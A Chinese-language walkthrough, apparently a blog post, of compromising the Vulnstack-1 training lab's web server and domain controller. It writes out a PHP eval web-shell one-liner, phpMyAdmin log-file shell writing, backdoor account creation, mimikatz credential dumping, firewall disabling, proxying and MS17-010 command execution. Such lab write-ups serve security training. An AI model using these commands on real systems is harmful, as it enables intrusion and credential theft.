vulnstack内网渗透环境靶场-1 大全

一．搭建vulnstack靶场环境
主要以真实企业环境为实例搭建一系列靶场，通过练习另外本次实战完全模拟ATT&CK攻击链路进行搭建，开成完整闭环，下载地址：
http://vulnstack.qiyuanxuetang.net/vuln/detail/2/

这次靶场一共三个环境，win7，win2003，win2008，win7是web服务器，上面我们需要两张网卡，一张nat模式，一张主机模式，win2003是域成员，win2008为域控
Win7配置如下：

在win7中使用phpstudy开启环境，然后在win7中ping各主机，保持各个主机之间能够互相访问，在自己的攻击机中能访问到win7的网站页面。至此，环境已经搭建完毕。

二．官方提供的流程
环境官方有提供相关的渗透流程为：
一、环境搭建
1.环境搭建测试
2.信息收集
二、漏洞利用
3.漏洞搜索与利用
4.后台Getshell上传技巧
5.系统信息收集
6.主机密码收集
三、内网搜集
7.内网–继续信息收集
8.内网攻击姿势–信息泄露
9.内网攻击姿势-MS08-067
10.内网攻击姿势-SMB远程桌面口令猜测
11.内网攻击姿势-Oracle数据库TNS服务漏洞
12.内网攻击姿势-RPC DCOM服务漏洞

四、横向移动
13.内网其它主机端口-文件读取
14.内网其它主机端口-redis
15.内网其它主机端口-redis Getshell
16.内网其它主机端口-MySQL数据库
17.内网其它主机端口-MySQL提权
五、构建通道
18.内网其它主机端口-代理转发
六、持久控制
19.域渗透-域成员信息收集
20.域渗透-基础服务弱口令探测及深度利用之powershell
21.域渗透-横向移动[wmi利用]
22.域渗透-C2命令执行
23.域渗透-利用DomainFronting实现对beacon的深度隐藏
24.域渗透-域控实现与利用
七、痕迹清理
25、日志清理

三．开始内网渗透
1.我们开始初步的步骤，先进行信息收集
暴露在外网的是win7的web服务，ip地址为192.168.137.130,先用nmap和dirsearch对其进行操作系统，端口版本信息，目录进行扫描，

2.根据收集到的信息渗透web服务器
我们可以看到端口就开放了80,3306，操作系统版本为win系列低版本，目录的话扫描出了网站备份，phpstudy的探针和phpmyadmin页面（其实我最后看大佬们的攻略，应该有一个yxcms的cms目录的，但是我的字典太垃圾了，没有扫到），接下来就是三个目标了，一是下载beifen.rar文件然后开始查看网站构成，二是登陆phpmyadmin，爆破账号密码查看数据库，三是用nmap扫描对方有没有相应的win系列低版本漏洞，我们就一边下载网站备份文件进行查看，一边爆破phpmyadmin的账号密码。
打开网站的备份文件，发现是一个名为yxcms的源码，应该确认网站应该是有yxcms搭成的网页，另外查看config文件，数据库的账号密码已经获得，同时我们得知版本应为1.2.1我们再在url中查看/yxcms,进入网站我们可以看到首页如下：

现在我们有三条路，一是按照版本为1.2.1的yxcms找它相关的漏洞获取权限，二是走phpmyadmin写入一句话获取权限，三是用nmap扫描目标是否有系统漏洞，我们先走第一条路试一试。

（1）1.2.1 yxcms
打开默认管理员登陆得后台yxcms/index.php?r=admin/index/login，使用默认账号密码admin 123456进行登陆，登陆成功，在后台的前台模板中有一个上传php的功能

我们上传一个一句话木马进行尝试，不过在上传过程中抓包没有回显上传后的地址，幸亏我们有网站备份，在中间搜索这些前台模板所在文件地址，发现地址为yxcms\protected\apps\default\view\default\123.php，所以我们尝试连接一句话木马，连接成功，下来查看ipconfig，发现这台电脑有两个网段，可能是一个内网网段，一个外网地址

（2）通过phpmyadmin获得webshell
通过爆破，发现phpmyadmin的账号密码为root root，登陆之后先查看是否有写入权限，show VARIABLES like ‘%secure%’

当我们查看mysql中的 secure_file_priv参数时，发现它的默认值是NULL，表示限制不能导入导出，当我们进行修改的时候就会报错，因为secure_file_priv参数是一个只读参数，不能通过set global命令修改，这表示我们不能直接outfile写入一句话了，我们尝试利用日志写入一句话木马，我们执行sql语句show global variables like ‘%general%’，查看日志功能的情况

日志功能是关闭的，我们打开它set global general_log=‘ON’，然后将日志文件的存放位置修改为当前网站的根目录(根据刚才的那个phpstudy探针显示的地址)，执行sql语句set global general_log_file = ‘C:/phpStudy/WWW/123.php’，然后我们再使用show global variables like ‘%general%‘查看，发现都已经设置好

下来就是执行一句话木马，让日志记录下来
select’<?php @eval($_POST["123"]); ?>’

发现执行成功，我们用蚁剑进行连接，连接成功，发现是有一个内网地址和一个外网地址

（3）直接通过系统版本漏洞进行攻击
我们通过刚开始的nmap扫描和phpstudy的探针，已经确定对方的web服务器为win7，我们就从win7的操作系统漏洞入手查看对方是否拥有，结果不出所料，对方只开启了80和3306，其他类似445,3389的端口都没开启，没办法了，思路一条(如果大佬们有其他办法，可以一起讨论讨论)，这条路走不通
总结：在渗透这台web服务器的过程中，只有两条路走的通，一条就是通过cms的漏洞，上传一句话木马文件获得webshell，另一个就是通过phpmyadmin写入webshell，系统漏洞方面暂时没有更好的想法，这就是从外网进入内网的一步。
3.从web服务器到内网拿到域控
现在web服务器已经到了我们手中，接下来要做的就是从web服务器横向移动拿到这个内网的域控了，不过现在我们是在用冰蝎进行连接，有点不舒服，我们直接用冰蝎的反弹shell功能直接把会话转到我们攻击机的Linux的msf上。

但是效果有点不好，在进行shell操作的时候会话容易直接死掉，我们再通过冰蝎上传一个msf的exe木马，效果非常好，感觉刚才那个php的反弹shell跟假的一样，下来我们就开始内网渗透。
在刚开始的信息收集中我们知道win7机器只开启了80和3306，我们先开启他的3389端口，使用run getgui -e

下来进入shell模式中（在进入shell模式有乱码现象，输入chcp 65001即可），我们可以通过netstat -an可以看到3389已经处于listening状态了，我们进入之后是administrator权限，先不进行提权，开启3389过程中我们也要创一个自己的账户啊，留一后手，先创建一个账户test，net user test Admin123 /add，然后把test账号添加到当地administrator组里面，net localgroup administrators test /add，这就已经创建好了，我们可以远程登录看看。

登录成功，下来我们就是收集当前机器的信息。

可以看到当前的机器是存在一个名为god.org的域内的，在确定已经是一个域用户之后，然后我们使用msf的getsystem提下权

我们可以看到已经提到system权限了，下来直接加载minikatz抓取这台机器的账号密码，使用load kiwi加载猕猴桃

在此之间记得迁移进程，然后使用credes_all抓取所有密码

当前的明文密码已经抓取到了（administrator的密码我打了一下马赛克），然后查看防火墙状况netsh firewall show state，并使用netsh advfirewall set allprofiles state off关掉防火墙

使用net view确定域内的计算机

我们使用net time /domain来确定域控主机

我们已经知道了域控主机为owa，然后开始横向渗透，先自动创建路由run post/multi/manage/autoroute

把当前会话挂起来，通过post/multi/manage/autoroute这个模块查看路由表，并指定session为刚才的会话

然后我们使用auxiliary/server/socks_proxy这个模块开启socks代理，设置我们自己的服务器ip和端口，运行

下来我们使用msf自带的扫描模块use auxiliary/scanner/netbios/nbname来扫描192.168.52.0/24这个网段，查看存活主机

成功发现三台，一台就是我们刚才攻陷的web服务器STU1，另外我们已经在刚才的信息收集当中知道了域控的名字为OWA，所以我们下来的主要目标就是域控了，他的ip地址为192.168.52.138，下来我们对其端口进行详细的扫描，使用msf的扫描端口模块，use auxiliary/scanner/postscan/tcp,扫描对应的端口

扫描过程中看到了445，立马兴奋了起来，先使用大家最熟悉的永恒之蓝扫一波，看看有没有

发现有，我们打一波试一试，不过在这里我们需要注意一下，因为我们现在挂着有socks代理，所以我们不能使用反向链接了，需要正向的。

最后没有成功，推测应该是开启了防火墙，我们先使用command执行关闭防火墙指令，然后在用永恒之蓝攻击试试看，结果失败，不过我们还可以使用ms17_010command漏洞执行命令，在关闭防火墙的基础上，我们添加用户账号，添加到administraror组里面，先远控win7机器，再远控域控

已经可以看到这已经添加成功了，然后我们打开3389端口set command REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" “Server /v fDenyTSConnections /t REG_DWORD /d 0 /f 这是因为msf里面的引号需要转义，原命令为REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal” "Server /v fDenyTSConnections /t REG_DWORD /d 0 /f

这已经开启成功了，然后我们就先远控win7，然后再用win7远控域控

成功了，不过中间我用linux攻击机直接开代理远控能连接到，但是账号密码总不对，有点搞不懂，其实还有另一个办法，就是直接用wmi，psexec等工具直接使用账号密码横向移动，不过那个就先不搞了，想测试的就是在不知道密码的账号下进行内网渗透，这一套流程走下来，感觉官方的流程好强啊，下来可以再学学别的大佬都是怎么过这个靶场的

vulnstack内网渗透环境靶场-1 大全相关推荐

内网渗透初探(靶场环境搭建+web层面实验+内网基本操作)
靶场环境搭建在此我使用的是红日安全的环境下载地址(红日安全) 图片取自互联网,ip地址以实际地址为准操作系统 IP地址攻击者 kali IP地址:192.168.3.10 攻击者 Window ...
三层内网渗透笔记-靶场（teamssix.com）
环境搭建参考:https://blog.csdn.net/qq_63844103/article/details/126195711 宝塔映射端口 target 1和target2 开始: tar ...
内网渗透—红日靶场三
文章目录 0x01.环境配置 0x02.Centos getshell 0x03.Centos提权 0x04.内网穿透-设置路由 0x05.内网穿透-设置代理 0x06.获取内网目标shell 通过s ...
内网渗透DC-1靶场通关(CTF)
最新博客见我的个人博客地址 DC系列共9个靶场,本次来试玩一下DC-1,共有5个flag,下载地址. 下载下来后是 .ova 格式,建议使用vitualbox进行搭建,vmware可能存在兼容性问题. ...
内网渗透靶场 Vulnstack（一）
虽然网上说这个靶场不是很难,但我自己做起来还是困难重重,很多知识不了解,msf与cs都搞了一下,搞了蛮久的,学到了不少,继续努力!!! 首先对内网域进行了解一下. 域是计算机网络的一种形式,其中所有用 ...
内网安全：内网渗透.（拿到内网主机最高权限 vulntarget 靶场 A）
内网安全:内网渗透.(拿到内网主机最高权限) 内网穿透又被称为NAT穿透,内网端口映射外网,在处于使用了NAT设备的私有TCP/IP网络中的主机之间建立连接的问题.通过映射端口,让外网的电脑找到处于内 ...
三层网络靶场搭建MSF内网渗透
三层网络靶场搭建&MSF内网渗透在最近的CTF比赛中,综合靶场出现的次数越来越多,这种形式的靶场和真实的内网渗透很像,很贴合实际工作,但我们往往缺少多层网络的练习环境.本文通过VMware搭 ...
内网渗透|红日安全团队靶场渗透笔记|Mimikatz|MSF跳板
靶场下载:漏洞详情环境搭建: 文件下载下来有三个压缩包,分别对应域中三台主机: VM1对应win7是web服务器 VM2对应windows2003是域成员 VM3对应windows se ...
内网渗透—红日安全vulnstack(二)
文章目录 1. 环境说明 2. 开启靶场 3. 外网渗透 3.1 端口扫描 3.2 拿shell 3.2.1 CVE-2019-2725 3.2.2 MSF17-010 3.3 提权 4. 内网渗透 ...

vulnstack内网渗透环境靶场-1 大全

vulnstack内网渗透环境靶场-1 大全相关推荐

最新文章

热门文章